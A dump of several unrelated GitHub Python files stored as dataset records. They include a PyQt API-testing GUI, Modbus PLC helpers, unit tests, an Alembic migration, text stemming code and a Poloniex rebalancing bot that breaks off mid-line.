JsonCreator\r\nfrom settings import Settings\r\nfrom check_code import CheckCode\r\nfrom additional_testing import AdditionalTesting\r\nfrom new_line import NewLine\r\nfrom report_window import ViewReport\r\nfrom class_test import Response, GetMethod, PostMethod, DeleteMethod\r\nfrom resource_class import Resource\r\nfrom callbacks_test import CallbacksTest\r\nfrom doctest import testfile\r\n#from idlelib.ClassBrowser import file_open\r\nfrom PyQt4.Qt import QListWidgetItem\r\nfrom PyQt4.QtCore import QThread, SIGNAL\r\nimport logging\r\n\r\n\r\nclass LineExec(QThread):\r\n\r\n def __init__(self, mainJson):\r\n QThread.__init__(self)\r\n self.mainJson = mainJson\r\n\r\n def run(self):\r\n for line in self.mainJson:\r\n self.emit(SIGNAL(\"line_exec(PyQt_PyObject)\"), line)\r\n self.sleep(2)\r\n\r\n\r\nclass TestApp(QtGui.QMainWindow, main_design.Ui_Dialog):\r\n def __init__(self, parent=None):\r\n super(TestApp, self).__init__(parent)\r\n self.setupUi(self)\r\n\r\n self.txtFilePath = []\r\n self.txtFileUUID = []\r\n self.uploadFileUUID = []\r\n self.testFilePath = []\r\n self.newLineTest = [False]\r\n self.testFile = None\r\n\r\n self.errorNumber.display(0)\r\n\r\n self.printText = ['']\r\n self.json_work = JsonCreator(None, self.newLineTest)\r\n self.check_code = CheckCode(None)\r\n self.new_line = NewLine(self.newLineTest)\r\n self.settings = Settings()\r\n self.additional_tests = AdditionalTesting()\r\n self.new_line_window = None\r\n self.startBtn.clicked.connect(self.start_test)\r\n self.pushButton_2.clicked.connect(self.close_application)\r\n self.fileLoad.clicked.connect(self.file_open)\r\n self.checkDisplay.clicked.connect(self.check_the_code)\r\n self.reportBtn.clicked.connect(self.new_report)\r\n self.settingsBtn.clicked.connect(self.settings_window)\r\n self.ad_proj.clicked.connect(self.callbacks_test)\r\n\r\n self.tableWidget.setColumnCount(2)\r\n self.tableWidget.setColumnWidth(0, 400)\r\n self.tableWidget.setHorizontalHeaderLabels(\"Title;Status\".split(\";\"))\r\n self.tableWidget.horizontalHeader().setResizeMode(1, QtGui.QHeaderView.Stretch)\r\n\r\n self.errorFlag = [False]\r\n self.prevResponse = {}\r\n self.prevPayload = {}\r\n\r\n self.priceList = {}\r\n\r\n def start_test(self):\r\n self.txtFileUUID = []\r\n self.uploadFileUUID = []\r\n self.firstResourcesUpload = [False]\r\n with open('./data/setup.json') as codeLines_data:\r\n self.setupJson = json.load(codeLines_data)\r\n\r\n self.secretKey = self.setupJson['secret_key']\r\n self.publicKey = self.setupJson['public_key']\r\n self.httpAddress = self.setupJson['https']\r\n self.txtFilePath = self.settings.get_txt_path()\r\n self.testFilePath = self.settings.get_file_path()\r\n self.priceList = {\"reg_proj\": float(self.setupJson['reg_proj']),\r\n \"expert_proj\": float(self.setupJson['expert_proj']),\r\n \"proof_proj\": float(self.setupJson['proof_proj']),\r\n \"transcript_proj\": float(self.setupJson['transcript_proj']),\r\n \"combo_proj\": float(self.setupJson['combo_proj'])}\r\n self.errorNumber.display(0)\r\n\r\n if self.check_code.testFile:\r\n with open(self.check_code.testFile) as codeLines_data:\r\n data = json.load(codeLines_data)\r\n elif self.newLineTest[0]:\r\n with open('./data/new_line.json') as codeLines_data:\r\n data = json.load(codeLines_data)\r\n else:\r\n with open('./test_lines/00_Complete_Test.json') as codeLines_data:\r\n data = json.load(codeLines_data)\r\n\r\n while self.tableWidget.rowCount() > 0:\r\n self.tableWidget.removeRow(0)\r\n\r\n with open('./report/test_report.json', \"w\") as new:\r\n json.dump([], new)\r\n\r\n with open('./data/languages.json', \"w\") as new:\r\n json.dump([], new)\r\n\r\n with open('./data/open_projects.json', \"w\") as new:\r\n json.dump({\"projects\": []}, new)\r\n\r\n with open('./data/words_prices.json', \"w\") as new:\r\n json.dump([], new)\r\n\r\n with open('./data/firstUpload.json') as codeLines_data:\r\n firstUpload = json.load(codeLines_data)\r\n\r\n for firstU in firstUpload[\"data\"]:\r\n if str.lower(firstU[\"method\"]) == 'post':\r\n checkLine = PostMethod(firstU)\r\n checkLine.post_method(self.secretKey, self.publicKey, self.httpAddress, self.txtFilePath,\r\n self.txtFileUUID, self.testFilePath, self.uploadFileUUID,\r\n self.prevResponse, self.prevPayload, self.tableWidget,\r\n self.firstResourcesUpload, self.errorNumber)\r\n\r\n elif str.lower(firstU[\"method\"]) == 'get':\r\n checkLine = GetMethod(firstU)\r\n checkLine.get_method(self.secretKey, self.publicKey, self.httpAddress, self.prevResponse,\r\n self.prevPayload, self.tableWidget, self.testFilePath, self.uploadFileUUID,\r\n self.txtFileUUID, self.errorNumber)\r\n\r\n self.firstResourcesUpload[0] = True\r\n\r\n # payload = dict()\r\n \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n Deletes the existing Downloads\r\n directory to check up to date\r\n files.\r\n \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n if os.path.exists(\"Downloads\"):\r\n shutil.rmtree(\"Downloads\")\r\n\r\n self.initialize_data()\r\n\r\n self.progressBar.setMaximum(len(data[\"data\"]))\r\n self.progressBar.setValue(0)\r\n self.linePrint = LineExec(data[\"data\"])\r\n self.connect(self.linePrint, SIGNAL(\"line_exec(PyQt_PyObject)\"), self.line_exec)\r\n self.linePrint.start()\r\n self.stopBtn.setEnabled(True)\r\n self.stopBtn.clicked.connect(self.linePrint.terminate)\r\n\r\n def initialize_data(self):\r\n entry = {}\r\n with open('./data/words_prices.json') as codeLines_data:\r\n mainJson = json.load(codeLines_data)\r\n\r\n with open('./data/words_prices.json', 'w') as outfile:\r\n\r\n for txtUUID in self.txtFileUUID:\r\n uploaded_file = Resource(self.txtFilePath[self.txtFileUUID.index(txtUUID)], self.priceList)\r\n entry[txtUUID] = {'wordcount': uploaded_file.get_wordcount(),\r\n 'reg_proj_price': uploaded_file.get_reg_project_price(),\r\n 'expert_proj_price': uploaded_file.get_expert_project_price(),\r\n 'proof_proj_price': uploaded_file.get_proof_proj_price(),\r\n 'trranscrip_proj_price': uploaded_file.get_transcript_proj_price(),\r\n 'combo_proj_price': uploaded_file.get_combo_price()}\r\n\r\n mainJson.append(entry)\r\n\r\n for fileUUID in self.uploadFileUUID:\r\n uploaded_file = Resource(self.testFilePath[self.uploadFileUUID.index(fileUUID)], self.priceList)\r\n entry[fileUUID] = {'wordcount': uploaded_file.get_wordcount(),\r\n 'reg_proj_price': uploaded_file.get_reg_project_price(),\r\n 'expert_proj_price': uploaded_file.get_expert_project_price(),\r\n 'proof_proj_price': uploaded_file.get_proof_proj_price(),\r\n 'trranscrip_proj_price': uploaded_file.get_transcript_proj_price(),\r\n 'combo_proj_price': uploaded_file.get_combo_price()}\r\n mainJson.append(entry)\r\n\r\n json.dump(mainJson, outfile)\r\n\r\n def line_exec(self, line):\r\n if str.lower(line[\"method\"]) == 'get':\r\n # payload initialization\r\n checkLine = GetMethod(line)\r\n checkLine.get_method(self.secretKey, self.publicKey, self.httpAddress, self.prevResponse,\r\n self.prevPayload, self.tableWidget, self.testFilePath, self.uploadFileUUID,\r\n self.txtFileUUID, self.errorNumber)\r\n\r\n # Post line code\r\n elif str.lower(line[\"method\"]) == 'post':\r\n checkLine = PostMethod(line)\r\n checkLine.post_method(self.secretKey, self.publicKey, self.httpAddress, self.txtFilePath, self.txtFileUUID,\r\n self.testFilePath, self.uploadFileUUID, self.prevResponse, self.prevPayload,\r\n self.tableWidget, self.firstResourcesUpload, self.errorNumber)\r\n\r\n elif str.lower(line[\"method\"]) == 'delete':\r\n checkLine = DeleteMethod(line)\r\n checkLine.delete_method(self.secretKey, self.publicKey, self.httpAddress, self.txtFilePath, self.txtFileUUID,\r\n self.testFilePath, self.uploadFileUUID, self.prevResponse, self.prevPayload,\r\n self.tableWidget, self.firstResourcesUpload, self.errorNumber)\r\n\r\n self.progressBar.setValue(self.progressBar.value() + 1)\r\n\r\n def file_open(self):\r\n self.new_line_window = NewLine(self.newLineTest)\r\n self.new_line_window.show()\r\n\r\n def check_the_code(self):\r\n self.check_code.show()\r\n\r\n def new_report(self):\r\n self.viewReport = ViewReport(self.tableWidget)\r\n self.viewReport.show()\r\n\r\n def close_application(self):\r\n # popup messegae before exiting\r\n choice = QtGui.QMessageBox.question(self, 'Quit', \"Quit application?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\r\n\r\n if choice == QtGui.QMessageBox.Yes:\r\n sys.exit()\r\n else:\r\n pass\r\n\r\n def settings_window(self):\r\n self.settings.show()\r\n\r\n def additional_window(self):\r\n self.additional_tests = AdditionalTesting()\r\n self.additional_tests.show()\r\n\r\n def callbacks_test(self):\r\n CallbacksTest(self.tableWidget, self.errorNumber)\r\n\r\nclass StreamToLogger(object):\r\n \"\"\"\r\n Fake file-like stream object that redirects writes to a logger instance.\r\n \"\"\"\r\n\r\n def __init__(self, logger, log_level=logging.INFO):\r\n self.logger = logger\r\n self.log_level = log_level\r\n self.linebuf = ''\r\n\r\n def write(self, buf):\r\n for line in buf.rstrip().splitlines():\r\n self.logger.log(self.log_level, line.rstrip())\r\n\r\n\r\n logging.basicConfig(\r\n level=logging.DEBUG,\r\n format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',\r\n filename=\"main_log.log\",\r\n filemode='w+')\r\n\r\n def flush(self):\r\n pass\r\n\r\ndef main():\r\n # Logging - commented off, else On\r\n stdout_logger = logging.getLogger('STDOUT')\r\n sl = StreamToLogger(stdout_logger, logging.INFO)\r\n sys.stdout = sl\r\n\r\n stderr_logger = logging.getLogger('STDERR')\r\n sl = StreamToLogger(stderr_logger, logging.ERROR)\r\n sys.stderr = sl\r\n \r\n app = QtGui.QApplication(sys.argv)\r\n app.setStyle('cleanlooks')\r\n form = TestApp()\r\n form.show()\r\n app.exec_()\r\n sys.stdout = sys.__stdout__\r\n sys.stderr = sys.__stderr__\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yvgenyk/API-Test2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32795571796","text":"# -*- coding: utf-8 -*-\n#---\nc = None\n\ndef centroMassa(size):\n return (round(size[0]/2),round(size[1]/2))\n\ndef openCLP(ip,q):\n from pyModbusTCP.client import ModbusClient\n print('Execuntado processo',ip)\n c = ModbusClient(host=ip, auto_open=True, auto_close=True)\n if c.open():\n print('Conexao completada')\n q.put(c)\n\ndef conexaoCLP(ip=''):\n print('Criando conexao')\n from pyModbusTCP.client import ModbusClient\n c = ModbusClient(host=ip, auto_open=False, auto_close=False)\n if c.open():\n print('Conexao realizada com sucesso!!')\n regs_list_1 = c.read_holding_registers(0, 10)\n regs_list_2 = c.read_holding_registers(55, 10)\n c.close()\n return c\n return False\n \ndef lerCLP(obj, registro):\n import time\n # obj.debug = True\n for s in range(0,65535):\n k = obj.read_holding_registers(s, 10)\n time.sleep(.01)\n print(f'registro:{s} value: {k}')\n \ndef escreverCLP(obj, registro,value):\n if obj.open():\n obj.write_multiple_registers(registro, value)\n \n \ndef lerTagsCSV():\n import pandas as pd\n df = pd.read_csv('libs/assets/tags_ug2.csv',sep=',',names=['name','device','type','address','x','sinal']) #usecols=[])\n # cols = iter(['index','name','device','address','x','sinal'])\n # for col in df.columns:\n # df = df.rename(columns={col: next(cols)},inplace = True)\n return df\n print(df.shape)\n print(df.columns)\n \ndef convertDataFrame(dados,colunas):\n print(dados)\n \n \ndef rastrearIP(HOST):\n import socket\n\n # HOST ='192.168.10' # Standard loopback interface address (localhost)\n # PORT = 65432 # Port to listen on (non-privileged ports are > 1023)\n for host_ in [f'{HOST}.{str(i)}' for i in range(1,255)]:\n print(host_)\n for port in range(1,65000):\n print(host_,':',port)\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((str(host_).strip(), str(port).strip()))\n s.listen()\n conn, addr = s.accept()\n with conn:\n print('Connected by', addr)\n # while True:\n # data = conn.recv(1024)\n # if not data:\n # break\n # conn.sendall(data)\n\ncores = {\n 'back':'#D9D9D9',\n 'card':'#FFFFFF',\n 'inputLine':'#333333',\n 'buttonOFF': '#333333',\n 'buttonON':'#17B556',\n 'buttonRead':'#125F80',\n 'buttonWrite':'#0F2983',\n 'displayON':'#08BB24',\n 'displayOFF':'#000000',\n }","repo_name":"MilianoJunior/test_plataform","sub_path":"libs/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"40999407282","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"Unittest for the target property classes of mfng.py.\"\"\"\n\nimport mfng\nimport unittest\nimport numpy\nfrom known_values import known_values\n\nclass CreationTests(unittest.TestCase):\n\n def testDistributionFunctionValues(self):\n \"The value of the DistributionFunction should be correct.\"\n distfunc = mfng.DistributionFunction(\"2*numpy.exp(-k)\", 100)\n self.assertAlmostEqual(distfunc.value(numpy.log(8)), 0.25)\n\n# def testEnergy(self):\n# df=mfng.DistributionFunction(\"2*numpy.exp(-k)\", 100)\n# pm=mfng.ProbMeasure()\n# lpm=pm.iterate(3)\n# self.assertAlmostEqual(df.energy(lpm, 400)[0], -97.436661566437408)\n#\n# def testEnergy2(self):\n# divs= [0.13193312663039208, 1.0]\n# probs=numpy.array([[ 0.25904704, 0.30615741],\n# [ 0.30615741, 0.12863815]])\n# pm=mfng.ProbMeasure(divs, probs)\n# lpm=pm.iterate(3)\n# df=mfng.DistributionFunction(\"k**-3\", 100, mindeg=1)\n# self.assertAlmostEqual(df.energy(lpm, 400)[0], -92.244977910442273)\n\nclass EnergyTests(unittest.TestCase):\n\n def testDistributionFunctionValues(self):\n \"The energy of the DistributionFunction should be correct.\"\n for i in range(2):\n divs = known_values[i][\"divs\"]\n probs = known_values[i][\"probs\"]\n energy = known_values[i][\"energy\"]\n\n pm = mfng.ProbMeasure(divs, probs)\n lpm = pm.iterate(4)\n prop = mfng.DistributionFunction('k**-2', maxdeg=2000-1, mindeg=1)\n self.assertAlmostEqual(prop.energy(lpm, 2000)[0], energy)\n prop = mfng.DistributionFunctionC('k**-2', maxdeg=2000-1, mindeg=1)\n self.assertAlmostEqual(prop.energy(pm, 2000)[0], energy, places=4)\n\ndef suite():\n energy_suite = unittest.makeSuite(EnergyTests)\n creation_suite = unittest.makeSuite(CreationTests)\n return unittest.TestSuite([energy_suite, creation_suite])\n\ndef test():\n runner = unittest.TextTestRunner()\n runner.run(suite())\n\nif __name__ == \"__main__\":\n test()\n\n","repo_name":"horvatha/mfng","sub_path":"mfng/tests/test_DistributionFuntion.py","file_name":"test_DistributionFuntion.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"6154360596","text":"\"\"\"change_nullable\n\nRevision ID: d31f8eea5092\nRevises: 14ba29293ee5\nCreate Date: 2020-05-22 22:32:57.599769\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd31f8eea5092'\ndown_revision = '14ba29293ee5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('leads', 'name',\n existing_type=sa.VARCHAR(length=150),\n nullable=True,\n existing_comment='ФИО или название компании')\n # ### end Alembic commands ###\n\n op.execute(\"\"\"\n ALTER TABLE leads ALTER COLUMN incoming_date SET DEFAULT current_date;\n \"\"\")\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('leads', 'name',\n existing_type=sa.VARCHAR(length=150),\n nullable=False,\n existing_comment='ФИО или название компании')\n # ### end Alembic commands ###\n","repo_name":"zorik19/bankProject","sub_path":"source/migrations/alembic/versions/d31f8eea5092_change_nullable.py","file_name":"d31f8eea5092_change_nullable.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23104335701","text":"import pandas as pd\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import SnowballStemmer\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\n\ntest_filename = '../data/test.csv'\ntrain_filename = '../data/train.csv'\nvalid_filename = '../data/valid.csv'\n\ntrain_news = pd.read_csv(train_filename)\ntest_news = pd.read_csv(test_filename)\nvalid_news = pd.read_csv(valid_filename)\n\n\nstemmer = SnowballStemmer('english')\ntrain_s=[' '.join([stemmer.stem(word) for word in text.split(' ')])\n for text in train_news['Statement']]\ntest_s=[' '.join([stemmer.stem(word) for word in text.split(' ')])\n for text in test_news['Statement']]\n\n\n\nlemmatizer = nltk.stem.WordNetLemmatizer()\ntrain_l=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in train_news['Statement']]\ntest_l=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in test_news['Statement']]\n\ntrain_sl=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in train_s]\ntest_sl=[' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in test_s]\n\ndef stem (sentence):\n answ = [' '.join([stemmer.stem(word) for word in text.split(' ')])\n for text in sentence]\n\n return answ\n\ndef lemmatize (sentence):\n answ = [' '.join([lemmatizer.lemmatize(word) for word in text.split(' ')])\n for text in sentence]\n\n return answ\n","repo_name":"mikub97/fakenews2","sub_path":"src/machinelearning/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"43475649122","text":"# -*-coding:UTF-8 -*\nimport configparser\nimport logging\nfrom os.path import dirname, abspath, join\n\nimport model.game\nimport model.service\nimport model.team\nfrom model import properties\nfrom model.properties import SETTINGS_FILE\n\nlog = logging.getLogger('default')\n\n\ndef logger_setup():\n config = configparser.ConfigParser()\n config.read(SETTINGS_FILE)\n log.setLevel(logging.DEBUG)\n # console handler\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n log.addHandler(sh)\n # create file handler which logs even debug messages\n log_file = join(abspath(dirname(dirname(__file__))), config[\"MISC\"][\"log_file\"])\n fh = logging.FileHandler(log_file, mode='a', encoding='utf-8')\n formatter = logging.Formatter('%(asctime)s [%(levelname)s]\\t%(message)s', datefmt='%m/%d/%Y %H:%M:%S')\n fh.setFormatter(formatter)\n fh.setLevel(logging.DEBUG)\n log.addHandler(fh)\n log.debug(\"#################### NEW INSTANCE ####################\")\n\n\ndef initialize():\n logger_setup()\n properties.parse_settings()\n model.service.setup_db()\n\n\n","repo_name":"vdsbenoit/baden","sub_path":"baden/controller/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39808737962","text":"#!/usr/bin/env python3\n# Before running this script you need to\n# 1) Install Python 3 (select add to PATH)\n# 2) Type in CMD: python -m pip install --upgrade pip\n# 3) Type in CMD: pip3 install https://github.com/s4w3d0ff/python-poloniex/archive/v0.4.7.zip\n# 4) Adjust in this script on line 29: 'Your_Poloniex_Key_Here' & 'Your_Poloniex_Secret_Here'\n# 5) In CMD Navigate to PoloniexTradeBot folder\n# 6) Run the script: python AllCoinsInBTC.py 0.001 \n# Where 0.001 is the BTC Value for each Altcoin \n# Script by BitcoinDaytraderChannel@gmail.com\n# Youtube.com/c/BitcoinDaytrader\n \n# Import Standard Library Modules\nimport time\nimport sys\n# Import the External Poloniex Library (python-poloniex-master folder + PIP install poloniex)\nimport poloniex \nfrom poloniex import Poloniex\n\ntry: # First check for user BTC Value input\n\tbudget = str(sys.argv[1])#.format('0.001')\nexcept: # Print an Exeption (error) if there is no input\n\tprint(\"put Budget in as python AllCoinsInBTC.py 0.001\")\n\texit(1)\n\nwhile True: # Setup to connect to Poloniex API\n\ttry:\n\t\tpolo = Poloniex()\n\t\tpolo.key = 'Your_Poloniex_Key_Here'\n\t\tpolo.secret = 'Your_Poloniex_Secret_Here'\n\t\tprint(\" \")\n\t\tprint(\"---!Connected to Poloniex.com!---\")\n\t\tbreak\n\texcept:\n\t\tbackoff(\"Can not connect to Poloniex API\")\n\t\texit(1)\n\t\t\ndef backoff(msg): # Function for the Error Message later in script\n print(msg)\n time.sleep(0.1)\n\ndef decor (func):\n\tdef wrap():\n\t\tprint(\" #################\")\n\t\tfunc()\n\t\tprint(\" #################\")\n\treturn wrap\n\n@decor #send print_budget to decor function \ndef print_budget():\n\tprint(\" # Budget=\", budget , \"#\") # Show budget input\n@decor\ndef print_pair():\n\tprint(\"# Market =\", pair , \"#\") # Show name of Market\n\t\t\t\nif __name__ == '__main__':\t# Start the main BUY/SELL script\n\tprint_budget();\n\tPoloniexCoins = [\"ARDR\",\"ATOM\",\"BAT\",\"BCHABC\",\"BCHSV\",\"BCN\",\"BNT\",\"BTS\",\"CVC\",\"DASH\",\"DCR\",\"DGB\",\"DOGE\",\"EOS\",\"ETC\",\"ETH\",\"FCT\",\"FOAM\",\"GAS\",\"GNT\",\"GRIN\",\"KNC\",\"LOOM\",\"LPT\",\"LSK\",\"LTC\",\"MANA\",\"MAID\",\"NMR\",\"NXT\",\"OMG\",\"OMNI\",\"POLY\",\"QTUM\",\"REP\",\"SC\",\"SNT\",\"STORJ\",\"STR\",\"STRAT\",\"VIA\",\"VTC\",\"XEM\",\"XMR\",\"XPM\",\"XRP\",\"ZEC\",\"ZRX\"]\n\tcounter = 0 # Where to start in list (0=AMP, 1=ARDR, 2=BAT...)\n\tmax_index = len(PoloniexCoins) - 1 # Length PoloniexCoins List - 1 List start at 0 not 1 \n\tprint(\"Total amount of Altcoins on Poloniex BTC Market = \" , max_index)\n\twhile counter <= max_index: # while = loop through PoloniexCoins List until max_index\n\t\tAltCoin = PoloniexCoins[counter] # Every loop change variable AltCoin to counter (0=AMP, 1=ARDR, 2=BAT...)\n\t\tpair = \"BTC_\" + AltCoin # Market: BTC_ + AltCoin to create coinpairs (BTC_AMP , BTC_ARDR, BTC_BAT...)\n\t\tprint_pair();\n\n\t\twhile True: #0 First check if the coinpair already has a Open Order & Cancel it\n\t\t\ttry:\n\t\t\t\treturnOpenOrders = polo.returnOpenOrders()[pair] # Collect the open orders of the coinpair\t\t\t\n\t\t\t\tif returnOpenOrders != []: # if the openorders are not empty Cancel the Order\n\t\t\t\t\treturnOrderNumber = polo.returnOpenOrders()[pair][0]['orderNumber'] # Collect last orderNumber\t\n\t\t\t\t\treturnOrderAmount = polo.returnOpenOrders()[pair][0]['amount'] # Collect OrderAmount\n\t\t\t\t\tprint(\"Open Order: \", returnOrderNumber, \"Total Amount in BTC: \" , returnOrderAmount ) # OpenOrder Info\n\t\t\t\t\tcancelOrder = polo.cancelOrder(returnOrderNumber)# cancel order with latest orderNumber\n\t\t\t\t\tprint(\"---!CANCEL Complete!---\") # Reloop the OpenOrder Check\t\t\t\t\t\t\n\t\t\t\telse: # if the openorders are not empty\n\t\t\t\t\t#print(\"---!No OpenOrders!---\")\n\t\t\t\t\tbreak\t\t\t\t\n\t\t\texcept: # Print an Exeption (error) if script can't collect Orders\n\t\t\t\tbackoff(\"Can not get the OpenOrder\")\n\t\t\t\texit(1) # Exit the entire script\n\t\t\n\t\twhile True: #1 get the ticker of the coinpair (LowestAsk & HighestBid Price)\n\t\t\ttry:\n\t\t\t\tAsk = polo.returnTicker()[pair]['lowestAsk'] # Collect latest Sell(ask) & Buy (bid) prices\n\t\t\t\tBid = polo.returnTicker()[pair]['highestBid']\n\t\t\t\t#print(\"Sell price in BTC = \" , Ask)\n\t\t\t\t#print(\"Buy price in BTC = \" , Bid)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not get the Ask and Bid Price\")\n\t\t\t\texit(1)\n\n\t\twhile True: #2 Get the total amount of altcoins\n\t\t\ttry:\n\t\t\t\tAltTotal = polo.returnBalances()[AltCoin] # Get the amount of the altcoin\n\t\t\t\t#print(\"I have total \", AltCoin ,\"= \" , AltTotal)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not get the total amount of coins\")\n\t\t\t\texit(1)\n\t\t\n\t\twhile True: #3 calculate the total Alt Worth in BTC\n\t\t\ttry:\n\t\t\t\tAltWorth = float(Bid) * float(AltTotal) # Float for numbers with decimals (Bid see #1) (AltTotal see #2)\n\t\t\t\t#print(\"My\" , AltCoin , \"worth in BTC = \" , AltWorth)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not calculate altcoin total worth\")\n\t\t\t\texit(1)\n\t\t\n\t\twhile True: #4 Check if the AltWorth(see #3) is Higher or Lower than Budget (script-input)\t\n\t\t\ttry:\n\t\t\t\tif float(AltWorth) >= float(budget): #Higher = SELL \n\t\t\t\t\t#print(\"AltWorth is higher then budget\")\n\t\t\t\t\tAltSellWorth = float(AltWorth) - float(budget) # Calculate how much to sell in BTC\n\t\t\t\t\tprint(\"AltSellWorth in btc = \" , AltSellWorth)\n\t\t\t\t\tAltSell = float(AltSellWorth) / float(Bid) # Calculate how much AltCoins to Sell\n\t\t\t\t\tAltBuyWorth = 100 # To fix error when not defined in => #5 Orderbook\n\t\t\t\t\tbreak # stop if loop\n\t\t\t\telse: #------------------------------#Lower = BUY \n\t\t\t\t\t#print(\"AltWorth is lower then budget\")\n\t\t\t\t\tAltBuyWorth = float(budget) - float(AltWorth) # Calculate how much to buy in BTC\n\t\t\t\t\tprint(\"AltBuyWorth in btc = \" , AltBuyWorth)\n\t\t\t\t\tAltBuy = float(AltBuyWorth) / float(Ask) # Calculate how much AltCoins to Buy\n\t\t\t\t\tAltSellWorth = 100 # To fix error when not defined in => #5 Orderbook\n\t\t\t\t\tbreak # stop else loop\t\t\t\t\t\n\t\t\texcept:\n\t\t\t\tbackoff(\"The Order does not work, Maybe to small\") # Error if can't calculate\n\t\t\t\texit(1)\n\t\t\n\t\twhile True: #5 get the orderbook of the coinpair (All Sell & Buy Orders)\n\t\t\ttry:\n\t\t\t\tMinOrder = 0.0001 # Minimal order worth in BTC = Poloniex Trading Rule\n\t\t\t\tif MinOrder > AltSellWorth: # Compare MinOrder with AltSellWorth (see #4 if)\n\t\t\t\t\tprint(\" ---SELL Order To Small To Place---\")\n\t\t\t\t\tbreak # stop if loop\n\t\t\t\telif MinOrder > AltBuyWorth: # Compare MinOrder with AltBuyWorth (see #4 else)\n\t\t\t\t\tprint(\" ---BUY Order To Small To Place---\")\n\t\t\t\t\tbreak # stop elseif loop\t \t\t\t\n\t\t\t\telse: # run the buy/sell part if order is not to small\t\t\t\t\t\t\t\n\t\t\t\t\tif float(AltWorth) >= float(budget): # SELL!!! Compare SellOrder with Available Bids\n\t\t\t\t\t\t#print(\"**SELL** AltWorth HIGHER budget\")\t\t\t\t\t\t\n\t\t\t\t\t\tOrderBidsPrice0 = polo.returnOrderBook()[pair]['bids'][0][0] # Collect highest buyorder (0) price\n\t\t\t\t\t\tOrderBidsAmount0 = polo.returnOrderBook()[pair]['bids'][0][1] # Collect highest buyorder (0) amount\n\t\t\t\t\t\tOrderBidsSum0 = float(OrderBidsAmount0) * float(OrderBidsPrice0) # Calculate highest buyorder BTC Value\n\t\t\t\t\t\t\n\t\t\t\t\t\tif float(AltSellWorth) <= float(OrderBidsSum0): # Sell if highest bid (in BTC) is bigger than AltSellWorth (in BTC)\n\t\t\t\t\t\t\tsell = polo.sell(pair, Bid, AltSell) # Make the SellOrder\n\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in first Bid\")\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: # Highest BuyOrder (0) is to small, Calculate for 1st & 2nd BuyOrder (0&1)\n\t\t\t\t\t\t\tprint(\"Order is Bigger than BidsSum0\")\n\t\t\t\t\t\t\tOrderBidsPrice1 = polo.returnOrderBook()[pair]['bids'][1][0] # Collect 2nd highest buyorder (1) price\n\t\t\t\t\t\t\tOrderBidsAmount1 = polo.returnOrderBook()[pair]['bids'][1][1] # Collect 2nd highest buyorder (1) amount\n\t\t\t\t\t\t\tOrderBidsSum1 = float(OrderBidsAmount1) * float(OrderBidsPrice1) # Calculate 2nd highest buyorder BTC Value\n\t\t\t\t\t\t\tOrderBidsSum01 = float(OrderBidsSum0) + float(OrderBidsSum1) # Calculate 1st & 2nd highest buyorders BTC Value\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif float(AltSellWorth) >= float(OrderBidsSum01): #Highest BuyOrders (0&1) to small. Calculate for Order 0,1&2\n\t\t\t\t\t\t\t\tprint(\"Order is Bigger than BidsSum01\")\n\t\t\t\t\t\t\t\tOrderBidsPrice2 = polo.returnOrderBook()[pair]['bids'][2][0] # Collect 3nd highest buyorder (2) price\n\t\t\t\t\t\t\t\tOrderBidsAmount2 = polo.returnOrderBook()[pair]['bids'][2][1] # Collect 3nd highest buyorder (2) price\n\t\t\t\t\t\t\t\tOrderBidsSum2 = float(OrderBidsAmount2) * float(OrderBidsPrice2) # Calculate 3rd highest buyorder BTC Value\n\t\t\t\t\t\t\t\tOrderBidsSum012 = float(OrderBidsSum01) + float(OrderBidsSum2) # Calculate 1st 2nd & 3rd highest buyorders BTC Value\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif float(AltSellWorth) >= float(OrderBidsSum012): #Highest BuyOrders (0,1&2) to small. Sell to BuyOrder 0,1,2&3\n\t\t\t\t\t\t\t\t\tprint(\"Order is Bigger than 